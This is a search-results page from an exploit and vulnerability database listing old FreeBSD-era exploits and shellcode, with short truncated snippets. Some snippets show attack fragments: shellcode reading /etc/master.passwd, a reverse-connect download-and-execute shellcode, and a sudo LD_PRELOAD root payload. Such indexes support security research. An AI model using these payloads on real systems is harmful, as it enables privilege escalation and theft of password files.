Lucene search
K

25 matches found

seebug.org
seebug.org
added 2014/07/01 12:0 a.m.20 views

NcFTPd <= 2.8.5 - Remote Jail Breakout Vulnerability

No description provided by source. NcFTPd = 2.8.5 remote jail breakout Discovered by: Kingcope Contact: kcope2atgooglemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFT...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.21 views

Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit

No description provided by source. !/bin/sh Sudo = 1.6.9p18 local r00t exploit by Kingcope/2008/www.com-winner.com Most lame exploit EVER! Needs a special configuration in the sudoers file: --- Defaults setenv so environ vars are preserved : --- May also need the current users password to be type...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2009/07/28 12:0 a.m.26 views

NcFTPD 2.8.5 Jail Breakout

NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 220 localhost NcFTPd Server unregister...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2009/07/27 12:0 a.m.14 views

NcFTPd 2.8.5 - Remote Jail Breakout

NcFTPd 2.8.5 - Remote Jail Breakout NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 22...

0.1AI score
Exploits0
0day.today
0day.today
added 2009/07/27 12:0 a.m.22 views

NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability

Exploit for freebsd platform in category remote exploits ================================================== NcFTPd get /etc/passwd passwd local: passwd remote: /etc/passwd 502 Unimplemented command. 227 Entering Passive Mode 192,168,2,5,219,171 550 No such file. ftp ls .. 227 Entering Passive Mod...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/03/02 12:0 a.m.11 views

FreeBSD/x86 - setuid(0)&amp;execve({&quot;//sbin/ipf&quot;,&quot;-Faa&quot;,0},0); - 57 bytes

No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/03/02 12:0 a.m.16 views

FreeBSD/x86 - execve(/bin/cat &amp; /etc/master.passwd) - 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2009/02/16 12:0 a.m.17 views

FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation

FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code excution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when execution /bin/login, wha...

0.4AI score
Exploits0
seebug.org
seebug.org
added 2009/02/16 12:0 a.m.14 views

FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit

No description provided by source. FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code excution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when execution /bin/login, what leads to a possible...

7.1AI score
Exploits0
0day.today
0day.today
added 2009/02/16 12:0 a.m.22 views

FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit

Exploit for freebsd platform in category local exploits ==================================================================== FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit ==================================================================== FreeBSD 7.0-RELEASE telnet daemon...

6.8AI score
Exploits0
securityvulns
securityvulns
added 2008/12/26 12:0 a.m.33 views

FreeBSD 7/6x protosw kernel exploit

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 uname -rs FreeBSD 7.0-RELEASE id uid=1001donb gid=1001donb groups=1001donb,0wheel grep ^root /etc/master.passwd grep: /etc/master.passwd: Permission denied nm /boot/kernel/kernel | grep allproc c0bf26b8 B allproc c0bf2670 B allproclock cc -o x x.c ./x...

0.7AI score
Exploits0
seebug.org
seebug.org
added 2008/11/16 12:0 a.m.183 views

Sudo &lt;= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit

No description provided by source. !/bin/sh Sudo = 1.6.9p18 local r00t exploit by Kingcope/2008/www.com-winner.com Most lame exploit EVER! Needs a special configuration in the sudoers file: --- "Defaults setenv" so environ vars are preserved : --- May also need the current users password to be...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2008/11/15 12:0 a.m.28 views

Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation

Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation !/bin/sh Sudo "Defaults setenv" so environ vars are preserved : program.c include include include void init if !geteuid unsetenv"LDPRELOAD"; setgid0; setuid0; execl"/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL;...

1.2AI score
Exploits0
Debian CVE
Debian CVE
added 2008/09/25 7:0 p.m.26 views

CVE-2008-4247

ftpd in OpenBSD 4.3, FreeBSD 7.0, NetBSD 4.0, Solaris, and possibly other operating systems interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery CSRF attacks and execute arbitrary FTP commands via a long ftp:// URI...

7.5CVSS7.1AI score0.04045EPSS
Exploits1
seebug.org
seebug.org
added 2008/09/10 12:0 a.m.14 views

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

No description provided by source. / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/09/05 12:0 a.m.35 views

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

freebsd/x86 rev connect, recv, jmp, return results 90 bytes. Shellcode exploit for freebsdx86 platform / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 pls ex...

Exploits0
0day.today
0day.today
added 2008/09/05 12:0 a.m.29 views

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

Exploit for freebsd/x86 platform in category shellcode =========================================================== freebsd/x86 rev connect, recv, jmp, return results 90 bytes =========================================================== / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exi...

7AI score
Exploits0
seebug.org
seebug.org
added 2008/08/26 12:0 a.m.23 views

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/08/25 12:0 a.m.13 views

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

7.1AI score
Exploits0
0day.today
0day.today
added 2008/08/25 12:0 a.m.28 views

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

Exploit for freebsd/x86 platform in category shellcode ============================================================ freebsd/x86 /bin/cat /etc/master.passwd NULL free 65 bytes ============================================================ ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBS...

7AI score
Exploits0
Rows per page
Query Builder